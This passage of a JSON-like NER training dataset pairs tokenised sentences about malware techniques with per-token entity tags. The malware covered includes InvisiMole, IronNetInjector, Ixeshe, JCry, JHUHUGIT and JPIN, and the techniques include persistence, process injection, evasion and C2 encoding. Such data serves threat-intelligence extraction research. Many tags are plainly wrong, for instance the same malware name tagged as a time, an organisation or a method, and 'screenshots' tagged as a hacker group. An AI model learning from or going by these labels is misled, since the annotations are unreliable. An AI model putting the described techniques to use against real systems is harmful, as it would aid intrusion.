"for", - "indirect", - "execution", - "of", - "<code>ShellExecuteW</code>", - "and", - "<code>CreateProcessA</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "scan", - "the", - "network", - "for", - "open", - "ports", - "and", - "vulnerable", - "instances", - "of", - "RDP", - "and", - "SMB", - "protocols." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "disconnect", - "previously", - "connected", - "remote", - "drives." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "gather", - "network", - "share", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "has", - "used", - "TCP", - "to", - "download", - "additional", - "modules." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "use", - "a", - "modified", - "base32", - "encoding", - "to", - "encode", - "data", - "within", - "the", - "subdomain", - "of", - "C2", - "requests." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "avoids", - "analysis", - "by", - "encrypting", - "all", - "strings,", - "internal", - "files,", - "configuration", - "data", - "and", - "by", - "using", - "a", - "custom", - "executable", - "format." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "inject", - "its", - "backdoor", - "as", - "a", - "portable", - "executable", - "into", - "a", - "target", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "B-Features", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "obtain", - "a", - "list", - "of", - "running", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "inject", - "itself", - "into", - "another", - "process", - "to", - "avoid", - "detection", - "including", - "use", - "of", - "a", - "technique", - "called", - "ListPlanting", - "that", - "customizes", - "the", - "sorting", - "algorithm", - "in", - "a", - "ListView", - "structure." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "mimic", - "HTTP", - "protocol", - "with", - "custom", - "HTTP", - "“verbs”", - "HIDE,", - "ZVVP,", - "and", - "NOP." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "enumerate", - "Registry", - "values,", - "keys,", - "and", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "place", - "a", - "lnk", - "file", - "in", - "the", - "Startup", - "Folder", - "to", - "achieve", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "has", - "used", - "rundll32.exe", - "for", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "has", - "used", - "scheduled", - "tasks", - "named", - "<code>MSST</code>", - "and", - "<code>\\Microsoft\\Windows\\Autochk\\Scheduled</code>", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "capture", - "screenshots", - "of", - "not", - "only", - "the", - "entire", - "screen,", - "but", - "of", - "each", - "separate", - "window", - "open,", - "in", - "case", - "they", - "are", - "overlapping." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "check", - "for", - "the", - "presence", - "of", - "network", - "sniffers,", - "AV,", - "and", - "BitDefender", - "firewall." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "InvisiMole", - "has", - "used", - "Windows", - "services", - "as", - "a", - "way", - "to", - "execute", - "its", - "malicious", - "payload." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "use", - "a", - ".lnk", - "shortcut", - "for", - "the", - "Control", - "Panel", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "collect", - "information", - "about", - "installed", - "software", - "used", - "by", - "specific", - "users,", - "software", - "executed", - "on", - "user", - "login,", - "and", - "software", - "executed", - "by", - "each", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "uses", - "variations", - "of", - "a", - "simple", - "XOR", - "encryption", - "routine", - "for", - "C&C", - "communications." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "check", - "for", - "artifacts", - "of", - "VirtualBox,", - "Virtual", - "PC", - "and", - "VMware", - "environment,", - "and", - "terminate", - "itself", - "if", - "they", - "are", - "detected." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "gather", - "information", - "on", - "the", - "mapped", - "drives,", - "OS", - "version,", - "computer", - "name,", - "DEP", - "policy,", - "memory", - "size,", - "and", - "system", - "volume", - "serial", - "number." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "gathers", - "information", - "on", - "the", - "IP", - "forwarding", - "table,", - "MAC", - "address,", - "configured", - "proxy,", - "and", - "network", - "SSID." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "lists", - "local", - "users", - "and", - "session", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "obtain", - "running", - "services", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "gathers", - "the", - "local", - "system", - "time", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "replace", - "legitimate", - "software", - "or", - "documents", - "in", - "the", - "compromised", - "network", - "with", - "their", - "trojanized", - "versions,", - "in", - "an", - "attempt", - "to", - "propagate", - "itself", - "within", - "the", - "network." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "samples", - "were", - "timestomped", - "by", - "the", - "authors", - "by", - "setting", - "the", - "PE", - "timestamps", - "to", - "all", - "zero", - "values.", - "InvisiMole", - "also", - "has", - "a", - "built-in", - "command", - "to", - "modify", - "file", - "times." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "remotely", - "activate", - "the", - "victim’s", - "webcam", - "to", - "capture", - "content." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "uses", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "launch", - "a", - "remote", - "shell", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "InvisiMole", - "can", - "register", - "a", - "Windows", - "service", - "named", - "CsPower", - "as", - "part", - "of", - "its", - "execution", - "chain,", - "and", - "a", - "Windows", - "service", - "named", - "clr_optimization_v2.0.51527_X86", - "to", - "achieve", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Invoke-PSImage", - "can", - "be", - "used", - "to", - "embed", - "payload", - "data", - "within", - "a", - "new", - "image", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Invoke-PSImage", - "can", - "be", - "used", - "to", - "embed", - "a", - "PowerShell", - "script", - "within", - "the", - "pixels", - "of", - "a", - "PNG", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IronNetInjector", - "has", - "the", - "ability", - "to", - "decrypt", - "embedded", - ".NET", - "and", - "PE", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "IronNetInjector", - "has", - "the", - "ability", - "to", - "inject", - "a", - "DLL", - "into", - "running", - "processes,", - "including", - "the", - "IronNetInjector", - "DLL", - "into", - "explorer.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "IronNetInjector", - "can", - "obfuscate", - "variable", - "names,", - "encrypt", - "strings,", - "as", - "well", - "as", - "base64", - "encode", - "and", - "Rijndael", - "encrypt", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "IronNetInjector", - "has", - "been", - "disguised", - "as", - "a", - "legitimate", - "service", - "using", - "the", - "name", - "PythonUpdateSrvc." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "IronNetInjector", - "can", - "identify", - "processes", - "via", - "C#", - "methods", - "such", - "as", - "<code>GetProcessesByName</code>", - "and", - "running", - "Tasklist", - "with", - "the", - "Python", - "<code>os.popen</code>", - "function." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "IronNetInjector", - "can", - "use", - "an", - "IronPython", - "scripts", - "to", - "load", - "a", - ".NET", - "injector", - "to", - "inject", - "a", - "payload", - "into", - "its", - "own", - "or", - "a", - "remote", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IronNetInjector", - "can", - "use", - "IronPython", - "scripts", - "to", - "load", - "payloads", - "with", - "the", - "help", - "of", - "a", - ".NET", - "injector." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SecTeam" - ] - }, - { - "tokens": [ - "IronNetInjector", - "has", - "used", - "a", - "task", - "XML", - "file", - "named", - "<code>mssch.xml</code>", - "to", - "run", - "an", - "IronPython", - "script", - "when", - "a", - "user", - "logs", - "in", - "or", - "when", - "specific", - "system", - "events", - "are", - "created." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ixeshe", - "can", - "collect", - "data", - "from", - "a", - "local", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ixeshe", - "has", - "a", - "command", - "to", - "delete", - "a", - "file", - "from", - "the", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ixeshe", - "can", - "list", - "file", - "and", - "directory", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ixeshe", - "sets", - "its", - "own", - "executable", - "file's", - "attributes", - "to", - "hidden." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ixeshe", - "can", - "download", - "and", - "execute", - "additional", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Ixeshe", - "has", - "used", - "registry", - "values", - "and", - "file", - "names", - "associated", - "with", - "Adobe", - "software,", - "such", - "as", - "AcroRd32.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Ixeshe", - "can", - "list", - "running", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ixeshe", - "can", - "achieve", - "persistence", - "by", - "adding", - "itself", - "to", - "the", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "Registry", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ixeshe", - "uses", - "custom", - "Base64", - "encoding", - "schemes", - "to", - "obfuscate", - "command", - "and", - "control", - "traffic", - "in", - "the", - "message", - "body", - "of", - "HTTP", - "requests." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ixeshe", - "collects", - "the", - "computer", - "name", - "of", - "the", - "victim's", - "system", - "during", - "the", - "initial", - "infection." - ], - "ner_tags": [ - "B-Idus", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ixeshe", - "enumerates", - "the", - "IP", - "address,", - "network", - "proxy", - "settings,", - "and", - "domain", - "name", - "from", - "a", - "victim's", - "system." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ixeshe", - "collects", - "the", - "username", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ixeshe", - "can", - "list", - "running", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Ixeshe", - "uses", - "HTTP", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ixeshe", - "is", - "capable", - "of", - "executing", - "commands", - "via", - "cmd." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "JCry", - "has", - "encrypted", - "files", - "and", - "demanded", - "Bitcoin", - "to", - "decrypt", - "those", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JCry", - "has", - "been", - "observed", - "deleting", - "shadow", - "copies", - "to", - "ensure", - "that", - "data", - "cannot", - "be", - "restored", - "easily." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JCry", - "has", - "achieved", - "execution", - "by", - "luring", - "users", - "to", - "click", - "on", - "a", - "file", - "that", - "appeared", - "to", - "be", - "an", - "Adobe", - "Flash", - "Player", - "update", - "installer." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "JCry", - "has", - "used", - "PowerShell", - "to", - "execute", - "payloads." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JCry", - "has", - "created", - "payloads", - "in", - "the", - "Startup", - "directory", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JCry", - "has", - "used", - "VBS", - "scripts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "JCry", - "has", - "used", - "<code>cmd.exe</code>", - "to", - "launch", - "PowerShell." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "A", - "JHUHUGIT", - "variant", - "accesses", - "a", - "screenshot", - "saved", - "in", - "the", - "clipboard", - "and", - "converts", - "it", - "to", - "a", - "JPG", - "image." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "JHUHUGIT", - "has", - "used", - "COM", - "hijacking", - "to", - "establish", - "persistence", - "by", - "hijacking", - "a", - "class", - "named", - "MMDeviceEnumerator", - "and", - "also", - "by", - "registering", - "the", - "payload", - "as", - "a", - "Shell", - "Icon", - "Overlay", - "handler", - "COM", - "object", - "({3543619C-D563-43f7-95EA-4DA7E1CC396A})." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Many", - "strings", - "in", - "JHUHUGIT", - "are", - "obfuscated", - "with", - "a", - "XOR", - "algorithm." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JHUHUGIT", - "has", - "exploited", - "CVE-2015-1701", - "and", - "CVE-2015-2387", - "to", - "escalate", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JHUHUGIT", - "tests", - "if", - "it", - "can", - "reach", - "its", - "C2", - "server", - "by", - "first", - "attempting", - "a", - "direct", - "connection,", - "and", - "if", - "it", - "fails,", - "obtaining", - "proxy", - "settings", - "and", - "sending", - "the", - "connection", - "through", - "a", - "proxy,", - "and", - "finally", - "injecting", - "code", - "into", - "a", - "running", - "browser", - "if", - "the", - "proxy", - "method", - "fails." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "JHUHUGIT", - "dropper", - "can", - "delete", - "itself", - "from", - "the", - "victim.", - "Another", - "JHUHUGIT", - "variant", - "has", - "the", - "capability", - "to", - "delete", - "specified", - "files." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JHUHUGIT", - "can", - "retrieve", - "an", - "additional", - "payload", - "from", - "its", - "C2", - "server.", - "JHUHUGIT", - "has", - "a", - "command", - "to", - "download", - "files", - "to", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JHUHUGIT", - "has", - "registered", - "a", - "Windows", - "shell", - "script", - "under", - "the", - "Registry", - "key", - "<code>HKCU\\Environment\\UserInitMprLogonScript</code>", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JHUHUGIT", - "obtains", - "a", - "list", - "of", - "running", - "processes", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JHUHUGIT", - "performs", - "code", - "injection", - "injecting", - "its", - "own", - "functions", - "to", - "browser", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JHUHUGIT", - "has", - "used", - "a", - "Registry", - "Run", - "key", - "to", - "establish", - "persistence", - "by", - "executing", - "JavaScript", - "code", - "within", - "the", - "rundll32.exe", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "JHUHUGIT", - "is", - "executed", - "using", - "rundll32.exe." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "JHUHUGIT", - "has", - "registered", - "itself", - "as", - "a", - "scheduled", - "task", - "to", - "run", - "each", - "time", - "the", - "current", - "user", - "logs", - "in." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "JHUHUGIT", - "variant", - "takes", - "screenshots", - "by", - "simulating", - "the", - "user", - "pressing", - "the", - "\"Take", - "Screenshot\"", - "key", - "(VK_SCREENSHOT),", - "accessing", - "the", - "screenshot", - "saved", - "in", - "the", - "clipboard,", - "and", - "converting", - "it", - "to", - "a", - "JPG", - "image." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "A", - "JHUHUGIT", - "variant", - "encodes", - "C2", - "POST", - "data", - "base64." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JHUHUGIT", - "obtains", - "a", - "build", - "identifier", - "as", - "well", - "as", - "victim", - "hard", - "drive", - "information", - "from", - "Windows", - "registry", - "key", - "<code>HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum</code>.", - "Another", - "JHUHUGIT", - "variant", - "gathers", - "the", - "victim", - "storage", - "volume", - "serial", - "number", - "and", - "the", - "storage", - "device", - "name." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "B-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "JHUHUGIT", - "variant", - "gathers", - "network", - "interface", - "card", - "information." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "JHUHUGIT", - "variants", - "have", - "communicated", - "with", - "C2", - "servers", - "over", - "HTTP", - "and", - "HTTPS." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "JHUHUGIT", - "uses", - "a", - ".bat", - "file", - "to", - "execute", - "a", - ".dll." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "JHUHUGIT", - "has", - "registered", - "itself", - "as", - "a", - "service", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "JPIN", - "variant", - "downloads", - "the", - "backdoor", - "payload", - "via", - "the", - "BITS", - "service." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "JPIN", - "can", - "lower", - "security", - "settings", - "by", - "changing", - "Registry", - "keys." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "JPIN's", - "installer/uninstaller", - "component", - "deletes", - "itself", - "if", - "it", - "encounters", - "a", - "version", - "of", - "Windows", - "earlier", - "than", - "Windows", - "XP", - "or", - "identifies", - "security-related", - "processes", - "running." - ], - "ner_tags": [ - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JPIN", - "can", - "communicate", - "over", - "FTP." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JPIN", - "can", - "enumerate", - "drives", - "and", - "their", - "types.", - "It", - "can", - "also", - "change", - "file", - "permissions", - "using", - 